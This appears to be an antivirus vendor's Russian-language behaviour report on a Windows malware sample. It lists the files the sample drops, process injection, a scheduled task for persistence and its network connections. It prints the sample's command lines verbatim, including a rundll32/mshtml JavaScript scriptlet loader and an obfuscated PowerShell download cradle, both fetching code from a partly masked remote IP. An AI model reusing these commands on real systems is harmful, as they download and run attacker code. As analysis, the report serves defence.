Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://20.##.179.176/win/search.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\rundll32.exe' JavaSCRiPt:"\..\msHtmL,RunHTMLApplication ";document.write();GetObject('sCRiPT:http://20.##.179.176/htm/oldone');
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1492
Внедряет код в
следующие пользовательские процессы:
- rgergbrebree.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1162082.cvr
- %APPDATA%\rgergbrebree.exe
- %APPDATA%\wzrzbofgnrikl.exe
- %TEMP%\tmpee92.tmp
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\wzrzbofgnrikl.exe
Удаляет следующие файлы
- %TEMP%\tmpee92.tmp
Сетевая активность
Подключается к
- '20.##.179.176':80
- '20.##0.137.35':7400
TCP
Другие
- '20.##0.137.35':7400
Другое
Создает и запускает на исполнение
- '%APPDATA%\rgergbrebree.exe'
- '<SYSTEM32>\rundll32.exe' JavaSCRiPt:"\..\msHtmL,RunHTMLApplication ";document.write();GetObject('sCRiPT:http://20.##.179.176/htm/oldone');' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/C powersHeLL.exE -ex bYpaSs -nop -W 1 seT-contenT -vA ( NEw-obJeCT NET.wEbcliENT ).dOwNlOADdaTa( 'http://20.##.179.176/win/search.exe' ) -en BYte -PaTH '%APP...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\wzRZbofgnRIKL" /XML "%TEMP%\tmpEE92.tmp"' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' "/C powersHeLL.exE -ex bYpaSs -nop -W 1 seT-contenT -vA ( NEw-obJeCT NET.wEbcliENT ).dOwNlOADdaTa( 'http://20.##.179.176/win/search.exe' ) -en BYte -PaTH '%APP...
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\wzRZbofgnRIKL" /XML "%TEMP%\tmpEE92.tmp"
